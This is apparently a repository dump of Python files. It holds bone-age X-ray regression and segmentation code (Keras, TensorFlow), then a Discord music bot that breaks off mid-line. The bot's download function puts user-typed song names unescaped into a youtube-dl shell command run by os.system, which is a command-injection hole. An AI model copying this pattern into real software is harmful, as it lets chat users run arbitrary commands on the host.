set_session\n\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.applications.inception_v3 import preprocess_input as inception_v3_input\n\nfrom keras.applications.inception_resnet_v2 import InceptionResNetV2\nfrom keras.applications.inception_resnet_v2 import preprocess_input as inception_resnet_input\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, median_absolute_error, r2_score, explained_variance_score\nfrom tqdm import tqdm\nfrom config import *\n\n\ndef _batch_cvt(batch_data):\n imgs = []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n\n\ndef save_obj(obj, name):\n with open(name, 'wb') as f:\n pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name):\n with open(name, 'rb') as f:\n return pickle.load(f)\n\n\ndef load_hdf5(infile, key=\"data\"):\n with h5py.File(infile, \"r\") as f:\n return f[key][()]\n\n\ndef write_hdf5(value, outfile, key=\"data\"):\n with h5py.File(outfile, \"w\") as f:\n f.create_dataset(key, data=value, dtype=value.dtype)\n\n\ndef load_sex_ids(sex=0):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n ids = []\n if sex == 0:\n for i in range(len(dataset_df.index)):\n id = dataset_df.ix[dataset_df.index[i]]['id']\n ids.append(id)\n elif sex == 1:\n sex_df = dataset_df[dataset_df.male == True]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n elif sex == 2:\n sex_df = dataset_df[dataset_df.male == False]\n for i in range(len(sex_df.index)):\n id = dataset_df.ix[sex_df.index[i]]['id']\n ids.append(id)\n\n return np.array(ids)\n\n\ndef load_data(sex=0, img_size=299, batch_size=32, augment_times=5):\n data_ids = load_sex_ids(sex)\n select_ids = np.random.permutation(data_ids)[:batch_size]\n batch_x, batch_y = augment_data_with_ids(select_ids, img_size, augment_times=augment_times)\n return _batch_cvt(batch_x), batch_y\n\n\ndef augment_data_with_ids(ids, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA, augment_times=5):\n imgs = []\n boneages = []\n for id in ids:\n ims, bas = _augment_data_with_id(id, img_size, preprocess_fn, data_dir, augment_times)\n imgs.extend(ims)\n boneages.extend(bas)\n\n imgs = np.array(imgs, dtype=np.float32)\n boneages = np.array(boneages, dtype=np.float32)\n indexes = np.random.permutation(range(imgs.shape[0]))\n imgs = imgs[indexes]\n boneages = boneages[indexes]\n return imgs, boneages\n\n\ndef load_data_sex(sex, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA):\n ids = load_sex_ids(sex)\n imgs = []\n boneages = []\n for _id in tqdm(ids):\n img, boneage = load_single_with_id(_id, img_size, preprocess_fn, data_dir)\n imgs.append(img)\n boneages.append(boneage)\n return np.array(imgs, dtype=np.float32), np.array(boneages, dtype=np.float32)\n\n\ndef load_single_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA):\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n boneage = dataset_df.loc[dataset_df[\"id\"] == _id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_COLOR)\n img = cv2.resize(img, (img_size, img_size))\n img = preprocess_fn(np.array(img, dtype=np.float32))\n return img, boneage\n\n\ndef _pprint(content):\n if content.startswith(\"T\") or content.startswith(\"N\"):\n print content\n\n\nclass LossHistory(keras.callbacks.Callback):\n\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get(\"loss\"))\n\n\ndef _augment_data_with_id(_id, img_size=256, preprocess_fn=xception_input, data_dir=RSNA_TRAIN_DATA, augment_times=5):\n \"\"\"\n Online sampling with data augmentation\n :param _id:\n :param img_size:\n :param preprocess_fn:\n :param dataset_df:\n :param data_dir:\n :param augment_times:\n :return:\n \"\"\"\n imgs = []\n boneages = []\n dataset_df = pd.read_csv(RSNA_TRAIN_CSV)\n\n boneage = dataset_df.loc[dataset_df[\"id\"]==_id].boneage.values[0] / SCALE\n img_file_name = data_dir + \"/{}.png\".format(_id)\n img = cv2.imread(img_file_name, cv2.IMREAD_GRAYSCALE)\n img = cv2.resize(img, (img_size, img_size))\n\n imgs.append(preprocess_fn(np.array(img, dtype=np.float32)))\n boneages.append(boneage)\n\n if augment_times > 0:\n flipped = cv2.flip(img, 1) # horzational flip\n imgs.append(preprocess_fn(np.array(flipped, dtype=np.float32)))\n boneages.append(boneage)\n for i in range(augment_times):\n angle = np.random.randint(0, 360)\n M = cv2.getRotationMatrix2D(center=(img.shape[0] / 2, img.shape[1] / 2), angle=angle, scale=1)\n dst_ori = cv2.warpAffine(img, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n dst_flip = cv2.warpAffine(flipped, M, (img.shape[0], img.shape[1]), borderMode=cv2.BORDER_CONSTANT, borderValue=0)\n imgs.append(preprocess_fn(np.array(dst_ori, dtype=np.float32)))\n imgs.append(preprocess_fn(np.array(dst_flip, dtype=np.float32)))\n\n boneages.append(boneage)\n boneages.append(boneage)\n\n return imgs, boneages\n\n\nif __name__ == \"__main__\":\n \"\"\"\n data_x, data_y = \\\n load_data(sex=0, img_size=256, augment=False, preprocess_fn=inception_v3_input, debug=True, regression=False)\n \"\"\"\n import matplotlib.pyplot as plt\n\n imgs, boneages = load_data_sex(1)\n\n print imgs.shape\n print boneages.shape" }, { "alpha_fraction": 0.5686180591583252, "alphanum_fraction": 0.5808541178703308, "avg_line_length": 36.900001525878906, "blob_id": "ecb2b03174b777b7b2f1655f016cb3ce6ae0ffd8", "content_id": "ac478185eebf20b80e2bb095954e1ba0901a951c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4168, "license_type": "no_license", "max_line_length": 120, "num_lines": 110, "path": "/al_segmentation/step2_image_2_h5.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport argparse\nimport cv2\nimport utils_data\n\nfrom glob import glob\nfrom multiprocessing import Pool\nfrom tqdm import tqdm\n\nfrom config import *\n\n\ndef image_to_numpy(image_file, image_id, type=\"x\", save_dir=RSNA_GT_NP_ANNOTATED):\n assert type in [\"x\", \"y\"]\n img = cv2.imread(image_file, cv2.IMREAD_GRAYSCALE)\n if img.shape[0] > img.shape[1]:\n pad = (img.shape[0] - img.shape[1]) // 2\n pad_tuple = ((0, 0), (pad, pad))\n else:\n pad = (img.shape[1] - img.shape[0]) // 2\n pad_tuple = ((pad, pad), (0, 0))\n img = np.pad(img, pad_tuple, mode=\"constant\")\n img = cv2.resize(img, (IMAGE_SIZE, IMAGE_SIZE), interpolation=cv2.INTER_AREA)\n if type == \"x\":\n clahe = cv2.createCLAHE(clipLimit=2.0, tileGridSize=(8, 8))\n img = clahe.apply(img)\n if type == \"y\":\n img[img > 0] = 255\n img = img / 255.\n img = np.array(img, dtype=np.float32)\n utils_data.write_hdf5(img, save_dir + \"/{}_{}.h5\".format(image_id, type))\n\n\ndef save_images(image_files, type=\"x\"):\n for f in tqdm(image_files):\n image_id = f[f.rfind(\"/\") + 1: f.find(\"_\")]\n image_to_numpy(f, image_id, type)\n\n\nif __name__ == \"__main__\":\n if not os.path.isdir(RSNA_GT_NP_ANNOTATED):\n os.makedirs(RSNA_GT_NP_ANNOTATED)\n if not os.path.isdir(RSNA_GT_NP_UNANNOTATED):\n os.makedirs(RSNA_GT_NP_UNANNOTATED)\n if not os.path.isdir(RSNA_GT_NEW):\n os.makedirs(RSNA_GT_NEW)\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--num_process', type=int, help=\"number of process to run code\", default=4)\n parser.add_argument('--annotate', type=str, help=\"weather to save annotated or unannotated data\", default=\"adddata\")\n FLAGS = parser.parse_args()\n\n num_process = FLAGS.num_process\n annotate = FLAGS.annotate\n\n if annotate == \"annotate\":\n # initial annotated image data\n data_x_files = glob(RSNA_GT + \"/*_ori.png\")\n data_y_files = glob(RSNA_GT + \"/*_bin.png\")\n n_images = len(data_x_files)\n print \"[x] start to pre processing %d images\" % n_images\n\n if num_process > 1:\n p = Pool()\n for i in range(num_process):\n if i < num_process-1:\n sub_image_files_x = data_x_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n sub_image_files_y = data_y_files[i*(n_images//num_process): (i+1)*(n_images//num_process)]\n else:\n sub_image_files_x = data_x_files[i*(n_images//num_process):]\n sub_image_files_y = data_y_files[i*(n_images//num_process):]\n p.apply_async(save_images, args=(sub_image_files_x, \"x\"))\n p.apply_async(save_images, args=(sub_image_files_y, \"y\"))\n p.close()\n p.join()\n else:\n save_images(data_x_files, \"x\")\n save_images(data_y_files, \"y\")\n elif annotate == \"unannotate\":\n # initial unannotated data\n import utils_data\n\n annotated_ids = utils_data.load_annotated_data_np(data_dir=RSNA_GT_NP_ANNOTATED, return_ids=True)\n data_x_files = glob(RSNA_DATA_DIR + \"/*.png\")\n for f in tqdm(data_x_files):\n data_id = f[f.rfind(\"/\")+1: f.find(\".png\")]\n if data_id not in annotated_ids:\n image_to_numpy(f, data_id, type=\"x\", save_dir=RSNA_GT_NP_UNANNOTATED)\n\n elif annotate == \"adddata\":\n data_y_files = glob(RSNA_GT_NEW + \"/*_bin.png\")\n n_images = len(data_y_files)\n print \"[x] start to add %d images\" % n_images\n for f in data_y_files:\n data_id = f[f.rfind(\"/\")+1: f.find(\"_bin\")]\n print \"[x] add data %s \" % data_id\n image_x_file = RSNA_GT_NEW + \"/{}.png\".format(data_id)\n image_to_numpy(image_x_file, data_id, type=\"x\", save_dir=RSNA_GT_NP_ANNOTATED)\n image_to_numpy(f, data_id, type=\"y\", save_dir=RSNA_GT_NP_ANNOTATED)\n\n\n\"\"\"\nScript to initialize\npython step2_image_2_h5.py --annotate=annotate --num_process=4\npython step2_image_2_h5.py --annotate=unannotate\n\nScript to add data\npython step2_image_2_h5.py --annotate=adddata\n\"\"\"" }, { "alpha_fraction": 0.6316637396812439, "alphanum_fraction": 0.6429376602172852, "avg_line_length": 35.95833206176758, "blob_id": "6a54031b1bbd27480162db86816063e4052c9067", "content_id": "1427c875c47959affac57de6053095dbb593f0f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6209, "license_type": "no_license", "max_line_length": 104, "num_lines": 168, "path": "/paced_transfer/step1_ptl_gen.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport argparse\nimport os\nimport pprint\nimport keras\nimport time\nimport threading\nimport tensorflow as tf\n\nfrom keras.utils import multi_gpu_model\nfrom keras import optimizers\nfrom keras.backend.tensorflow_backend import set_session\n\nfrom keras.applications.xception import Xception\nfrom keras.applications.xception import preprocess_input as xception_input\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.callbacks import ModelCheckpoint\n\n\nfrom keras.layers import Dense, GlobalAveragePooling2D\nfrom keras.models import Model\nfrom tqdm import tqdm\nfrom sklearn.model_selection import train_test_split\n\nfrom config import *\nfrom utils_training import _set_trainable_layers, _pprint\nfrom utils_data import load_sex_ids, load_data, save_obj, load_data_sex\nfrom utils_metric import regression_metric\n\n\ndef _build_regressor(img_size=299, num_gpu=1, start_layer=-1, model_file=None, learning_rate=1E-4):\n input_shape = (img_size, img_size, 3)\n if start_layer == -1:\n base_model = Xception(input_shape=input_shape, weights=\"imagenet\", include_top=False)\n _set_trainable_layers(base_model, len(base_model.layers))\n else:\n base_model = Xception(input_shape=input_shape, weights=None, include_top=False)\n _set_trainable_layers(base_model, start_layer)\n\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n predictions = Dense(1, activation=keras.activations.relu)(x)\n model = Model(inputs=base_model.input, outputs=predictions)\n optimizer = optimizers.RMSprop(lr=learning_rate, decay=0.95)\n if num_gpu > 1:\n model = multi_gpu_model(model, num_gpu)\n print \"[x] compile model on %d GPU(s)\" % num_gpu\n\n if model_file!=None:\n model.load_weights(model_file)\n\n model.compile(optimizer=optimizer, loss=\"mean_squared_error\")\n model.summary(print_fn=_pprint)\n return model\n\n\nclass LossHistory(keras.callbacks.Callback):\n\n def on_train_begin(self, logs={}):\n self.losses = []\n\n def on_epoch_end(self, epoch, logs=None):\n self.losses.append(logs.get(\"loss\"))\n\n\ndef train(n_epoch=N_TRAINING_EPOCH, img_size=299, sex=0, batch_size=16, num_gpu=1, start_layer=-1):\n assert start_layer in [-1, XCEPTION_EXIT_START, XCEPTION_MID_START, XCEPTION_ENTRY_START, 0]\n assert sex in [0, 1, 2]\n # model file path\n if start_layer != -1:\n model_file = model_out_dir+\"/model.h5\"\n else:\n model_file = None\n\n # learning rate\n if start_layer == -1:\n learning_rate = 1E-3\n elif start_layer == XCEPTION_EXIT_START:\n learning_rate = 1E-4\n elif start_layer == XCEPTION_MID_START:\n learning_rate = 5E-5\n elif start_layer == XCEPTION_ENTRY_START:\n learning_rate = 1E-5\n else:\n learning_rate = 5E-6\n\n model = _build_regressor(img_size, num_gpu, start_layer, model_file, learning_rate)\n\n print \"[x] load data ...\"\n data_x, data_y = load_data_sex(sex, img_size, xception_input)\n print \"[x] loaded data_x {}, data_y {} data\".format(data_x.shape, data_y.shape)\n\n data_gen = ImageDataGenerator(\n rotation_range=180,\n zoom_range=0.1,\n horizontal_flip=True\n )\n\n x_train, x_test, y_train, y_test = train_test_split(data_x, data_y)\n data_gen.fit(x_train)\n\n model_callback = ModelCheckpoint(filepath=model_out_dir+\"/model.h5\", verbose=1, save_best_only=True)\n loss_callback = LossHistory()\n model.fit_generator(data_gen.flow(x_train, y_train, batch_size=batch_size),\n validation_data=(x_test, y_test),\n workers=4,\n callbacks=[model_callback, loss_callback],\n use_multiprocessing=True,\n epochs=n_epoch)\n save_obj(obj=loss_callback.losses, name=metric_out_dir+\"/losses_S{}.pkl\".format(start_layer))\n\n y_true = []\n y_pred = []\n for mini_batch in range(int(data_x.shape[0] // batch_size)):\n pred_y = model.predict_on_batch(data_x[mini_batch*batch_size:(mini_batch+1)*batch_size])\n for i in range(batch_size):\n y_true.append(data_y[mini_batch*batch_size+i] * SCALE)\n y_pred.append(pred_y[i] * SCALE)\n\n evs, mae, mse, meae, r2s, ccc = regression_metric(np.array(y_true), np.array(y_pred))\n save_obj({\"evs\": evs, \"mae\": mae, \"mse\": mse, \"meae\": meae, \"r2s\": r2s, \"ccc\": ccc},\n name=metric_out_dir + \"/evaluate_S{}.pkl\".format(start_layer))\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--exp', type=str, help=\"experiment name\", default=\"rm\")\n parser.add_argument('--img_size', type=int, help=\"image size\", default=128)\n parser.add_argument('--gpu_id', type=int, default=0)\n parser.add_argument('--batch_size', type=int, help=\"training batch size\", default=16)\n parser.add_argument('--sex', type=int, help=\"0 for all, 1 for male, 2 for female\", default=1)\n parser.add_argument('--start_layer', type=int, help=\"start_layer\", default=-1)\n parser.add_argument('--n_epoch', type=int, help=\"training epochs\", default=100)\n FLAGS = parser.parse_args()\n\n pprint.pprint(FLAGS)\n\n exp_name = FLAGS.exp\n img_size = FLAGS.img_size\n gpu_id = FLAGS.gpu_id\n batch_size = FLAGS.batch_size\n sex = FLAGS.sex\n start_layer = FLAGS.start_layer\n n_epoch = FLAGS.n_epoch\n\n print \"[x] building models on GPU {}\".format(gpu_id)\n\n os.environ[\"CUDA_DEVICE_ORDER\"] = \"PCI_BUS_ID\"\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"{}\".format(gpu_id)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n set_session(tf.Session(config=config))\n\n metric_out_dir = \"E{}_S{}_IMG_{}/metric\".format(exp_name, sex, img_size)\n model_out_dir = \"E{}_S{}_IMG_{}/model\".format(exp_name, sex, img_size)\n if not os.path.isdir(metric_out_dir):\n os.makedirs(metric_out_dir)\n if not os.path.isdir(model_out_dir):\n os.makedirs(model_out_dir)\n\n # training\n train(n_epoch=n_epoch,\n img_size=img_size,\n sex=sex,\n batch_size=batch_size,\n num_gpu=1,\n start_layer=start_layer)\n" }, { "alpha_fraction": 0.5568181872367859, "alphanum_fraction": 0.5762032270431519, "avg_line_length": 40.953269958496094, "blob_id": "685332d56d6c60c0b9eb54a48f700ebb1c4297e6", "content_id": "949d7f27d374a361e6288614cfbda262f01bbf25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4488, "license_type": "no_license", "max_line_length": 104, "num_lines": 107, "path": "/al_segmentation/tf_ops.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import tensorflow as tf\n\nSMOOTH = 1.\nclass BatchNorm(object):\n\n def __init__(self, epsilon=1e-5, momentum=0.9, name='batch_norm'):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum,\n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n\n\ndef conv2d(input_, output_dim, k=3, s=1, stddev=0.02, name='conv2d'):\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k, k, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, s, s, 1], padding=\"SAME\")\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(value=0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n return conv\n\n\ndef deconv2d(input_, output_dim, k=3, s=1, stddev=0.02, name='deconv2d'):\n input_shape = input_.get_shape().as_list()\n output_shape = [input_shape[0], input_shape[1]*2, input_shape[2]*2, output_dim]\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k, k, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape, strides=[1, s, s, 1])\n biases = tf.get_variable('biases', [output_shape[-1]],\n initializer=tf.constant_initializer(value=0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n return deconv\n\n\ndef upsampling2d(input_, output_dim, k=3, s=1, stddev=0.02, name='upsampling2d'):\n input_shape = input_.get_shape().as_list()\n output_shape = [input_shape[0], input_shape[1] * s, input_shape[2] * s, output_dim]\n with tf.variable_scope(name):\n w = tf.get_variable(\"w\", [k, k, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n conv2d_trans = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, s, s, 1])\n biases = tf.get_variable('biases', [output_shape[-1]],\n initializer=tf.constant_initializer(value=0.0))\n conv2d_trans = tf.reshape(tf.nn.bias_add(conv2d_trans, biases), conv2d_trans.get_shape())\n return conv2d_trans\n\n\ndef maxpool2d(input_, k=2, s=2):\n return tf.nn.max_pool(input_, ksize=[1, k, k, 1], strides=[1, s, s, 1], padding=\"SAME\")\n\n\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n bias= tf.get_variable(\"bias\", [output_size], initializer=tf.constant_initializer(bias_start))\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix)\n\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak*x)\n\n\ndef relu(x):\n return tf.nn.relu(x)\n\n\ndef sigmoid(x):\n return tf.nn.sigmoid(x)\n\n\ndef dropout(x, keep_prob=0.5):\n return tf.nn.dropout(x, keep_prob)\n\n\ndef dice_coef_loss(prob, label):\n batch_size, h, w, n_class = label.get_shape().as_list()\n assert n_class == 1\n flat_label = tf.reshape(label, [-1, h*w*n_class])\n flat_prob = tf.reshape(prob, [-1, h*w*n_class])\n intersection = tf.reduce_mean(2*tf.multiply(flat_prob, flat_label))+SMOOTH\n union = tf.reduce_mean(tf.add(flat_prob, flat_label))+SMOOTH\n loss = 1 - tf.div(intersection, union)\n return loss\n\n\ndef pixelwise_cross_entropy(logit, label):\n flat_logit = tf.reshape(logit, [-1])\n flat_label = tf.reshape(label, [-1])\n loss = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits=flat_logit, labels=flat_label))\n return loss" }, { "alpha_fraction": 0.6257668733596802, "alphanum_fraction": 0.6349693536758423, "avg_line_length": 22.285715103149414, "blob_id": "139169034a30d870beacfdd96bd9a2a163d41da0", "content_id": "f30de19a2f6712469c9da6f63e0b1320317847f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 652, "license_type": "no_license", "max_line_length": 58, "num_lines": 28, "path": "/paced_transfer/utils_training.py", "repo_name": "ganaiemudasir05/bone-age-assessment", "src_encoding": "UTF-8", "text": "import numpy as np\nimport cv2\n\nfrom keras import optimizers\nfrom keras.utils import multi_gpu_model\n\n\ndef _set_trainable_layers(model, start_layer):\n for i, layer in enumerate(model.layers):\n if i < start_layer:\n layer.trainable = False\n else:\n layer.trainable = True\n\n\ndef _pprint(content):\n if content.startswith(\"T\") or content.startswith(\"N\"):\n print content\n\n\ndef _batch_cvt(batch_data):\n imgs = []\n for data in batch_data:\n img = np.squeeze(data)\n img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)\n imgs.append(img)\n imgs = np.array(imgs, dtype=np.float32)\n return imgs\n" } ]
35
markov73/Bot-za-discord
https://github.com/markov73/Bot-za-discord
378922059c983f869ce8ad0a151a98a042f4e883
08f845dbc20832de141c86c7cfae81c8230d9c7f
70a093a20e430817f671f74d2bf4034336288209
refs/heads/main
2023-03-20T07:08:22.445817
2021-03-17T15:00:39
2021-03-17T15:00:39
348,746,854
0
0
null
2021-03-17T14:49:40
2021-03-17T13:59:28
2021-03-17T13:59:26
null
[ { "alpha_fraction": 0.5964556932449341, "alphanum_fraction": 0.60303795337677, "avg_line_length": 28.588014602661133, "blob_id": "1de70d71d4fa4807c9236a9b041904c37f2c52c1", "content_id": "4f38801f328f65a8dfb6c5dd9030bdf8f299ce49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7900, "license_type": "no_license", "max_line_length": 128, "num_lines": 267, "path": "/bot3.py", "repo_name": "markov73/Bot-za-discord", "src_encoding": "UTF-8", "text": "# bot.py\nimport os\nimport asyncio\nimport discord\nimport urllib.request\nimport re\nimport random\nimport difflib\nimport unicodedata\nfrom discord.ext import commands\nfrom discord.ext.commands import Bot\nfrom collections import deque\nfrom pretty_help import PrettyHelp\n\nserver = 'SERVER'\n\nsvirac = commands.Bot(command_prefix='<', help_command=PrettyHelp(no_category=\"Help\", show_index=False))\nq = deque()\nsviram = ' '\n\n#muzika s interneta\ndef download(upis):\n trazi = \"https://www.youtube.com/results?search_query=\"\n query = upis.replace(\" \", \"+\")\n trazi = trazi + query\n trazi = str(trazi.encode('utf-8').decode('ascii', 'ignore'))\n print(trazi)\n\n html = urllib.request.urlopen(trazi)\n video_ids = re.findall(r\"watch\\?v=(\\S{11})\", html.read().decode())\n rezultat = \"https://www.youtube.com/watch?v=\" + video_ids[0]\n\n naredba = 'youtube-dl -x --audio-format mp3 --output \"/home/jakov/Documents/muzickibot/muzika/' + upis + '.mp3\" ' + rezultat\n\n os.system(naredba)\n print('Skinuto je')\n\n#lista\ndef muzika(vc):\n global q\n global sviram\n\n if len(q) > 0 and not vc.is_playing():\n sviram = q.popleft()\n pesma = sviram + \".mp3\"\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + pesma\n print('Trebal bi svirati ' + pesma + ' ' + str(len(pesma)))\n vc.play(discord.FFmpegOpusAudio(pesma), after=lambda m: muzika(vc))\n\n return\n\n#spajanje na server\[email protected]\nasync def on_ready():\n for guild in svirac.guilds:\n if guild.name == server:\n break\n print(\n f'{svirac.user} is connected to the following guild:\\n'\n f'{guild.name}(id: {guild.id})'\n )\n\n#muzika s kompa\[email protected](name='sviraj', help='svira muziku s kompjutera')\nasync def sviraj(ctx, *ime):\n channel = ctx.message.author.voice.channel\n try: await channel.connect()\n except:\n vc = ctx.voice_client\n print('Already connected.')\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n\n fajlq = ime[0]\n duljina = len(ime)\n for x in range(1,duljina):\n fajlq = fajlq + ' ' + ime[x]\n\n pesma = fajlq + \".mp3\"\n #fajl postoji\n if os.path.exists('/home/jakov/Documents/muzickibot/muzika/' + pesma):\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + pesma\n q.append(fajlq)\n else:\n #fajl ne postoji\n najmanja = -1 #razlika najblizeg\n fajl = ' ' #ime najblizeg\n\n os.system('ls > popis.txt')\n file = open(\"popis.txt\", \"r\")\n\n for x in file:\n distanca = difflib.SequenceMatcher(None, pesma[:len(pesma)-4], x[:len(x)-4]).ratio()\n if(distanca > najmanja):\n najmanja = distanca\n fajl = x\n\n if najmanja > 0.65 * pow(0.995, len(fajl)-6):\n fajl = fajl[:len(fajl)-5]\n q.append(fajl)\n else:\n download(fajlq)\n await ctx.send('Skinuto je.')\n q.append(fajlq)\n\n vc = ctx.voice_client\n await ctx.send('Dodana je pesma ' + q[-1])\n\n muzika(vc)\n\n\n#pauziranje\[email protected](name='pauza', help='pauira muziku')\nasync def pauziraj(ctx):\n vc = ctx.voice_client\n try: vc.pause()\n except:\n response = 'Vec je pauzirano. Jebo ti pas mater glupu'\n await ctx.send(response)\n\n#resume\[email protected](name='nastavi', help='nastavlja muziku nakon pauziranja')\nasync def nastavak(ctx):\n vc = ctx.voice_client\n try: vc.resume()\n except:\n response = 'Nikaj je ne pauzirano. Naj me jebati'\n await ctx.send(response)\n\n#skip\[email protected](name='skip', help='preskace trenutni track')\nasync def skip(ctx):\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\n#remove from queue\[email protected](name='remove', help='brise pesmu sa kjua (index obavezan)')\nasync def remove(ctx, *imena):\n upis = imena[0]\n for x in range(1,len(imena)):\n upis = upis + ' ' + imena[x]\n try:\n q.remove(upis)\n response = 'Maknul sam pesmu ' + upis\n await ctx.send(response)\n except:\n response = 'Nema pesme na tom mestu u kjuu'\n await ctx.send(response)\n\n#disconnect\[email protected](name='disconnect', help='diskonektuje sa servera')\nasync def disconnect(ctx):\n try:\n kanal = ctx.voice_client.channel\n await ctx.voice_client.disconnect()\n except:\n await ctx.send('Nisam spojen. Koji ti je kurac?')\n\[email protected](name='lista', help='ispisuje kaj je na listi')\nasync def lista(ctx):\n response = ''\n for x in range(0,len(q)):\n response = response + str(x+1) + \" \" + q[x] + '\\n'\n embed = discord.Embed(title=\"Kju pesama\", description=response, color=discord.Color.red())\n await ctx.send(embed=embed)\n\n\[email protected](name='miks', help='shuffle')\nasync def miks(ctx):\n global q\n random.shuffle(q)\n\[email protected](name='clear', help='klira kju')\nasync def klir(ctx):\n global q\n q.clear()\n vc = ctx.voice_client\n try: vc.stop()\n except:\n response = 'Nist ne sviram'\n await ctx.send(response)\n\[email protected](name='popis', help='ispisuje popis mogucih pesama')\nasync def popis(ctx, slovo):\n os.system('ls > popis.txt')\n file = open(\"/home/jakov/Documents/muzickibot/muzika/popis.txt\", \"r\")\n ispis = ''\n for x in file:\n if x[0] == slovo.lower() or x[0] == slovo.upper():\n ispis = ispis + x + '\\n'\n\n embed = discord.Embed(title=\"Popis pesama\", description=ispis, color=discord.Color.blue())\n await ctx.send(embed=embed)\n\[email protected](name='download', help='skida pesmu s interneta')\nasync def skini(ctx, *upis):\n pjesma = upis[0]\n for x in range(1,len(upis)):\n pjesma = pjesma + ' ' + upis[x]\n download(pjesma)\n await ctx.send('Skinuto je.')\n\[email protected](name='now', help='ispisuje trenutnu pesmu')\nasync def now(ctx):\n vc = ctx.voice_client\n if vc.is_playing():\n await ctx.send('Sviram pesmu ' + sviram)\n else:\n await ctx.send('Ne sviram nikaj. Koji ti je kurac?')\n\[email protected](name='ladd', help='stavlja pesmu na odabranu playlistu (upisite ime liste pa zatim ime pesme)')\nasync def ladd(ctx, list, *args):\n upis = args[0]\n for x in range(1, len(args)):\n upis = upis + ' ' + args[x]\n\n fajl2 = open(list + \".txt\", \"a+\")\n\n if os.path.exists('/home/jakov/Documents/muzickibot/muzika/' + upis + \".mp3\"):\n pesma = '/home/jakov/Documents/muzickibot/muzika/' + upis + \".mp3\"\n fajl2.write(upis + \"\\n\")\n await ctx.send('Stavljena je pesma ' + upis + ' na listu ' + list)\n else:\n #fajl ne postoji\n najmanja = -1 #razlika najblizeg\n fajl = ' ' #ime najblizeg\n\n os.system('ls > popis.txt')\n file = open(\"popis.txt\", \"r\")\n\n for x in file:\n distanca = difflib.SequenceMatcher(None, upis, x[:len(x)-4]).ratio()\n if(distanca > najmanja):\n najmanja = distanca\n fajl = x\n\n if najmanja > 0.65 * pow(0.995, len(fajl)-6):\n fajl = fajl[:len(fajl)-5]\n fajl2.write(fajl + \"\\n\")\n await ctx.send('Stavljena je pesma ' + fajl + ' na listu ' + list)\n else:\n download(upis)\n await ctx.send('Skinuto je.')\n fajl2.write(upis + \"\\n\")\n await ctx.send('Stavljena je pesma ' + upis + ' na listu ' + 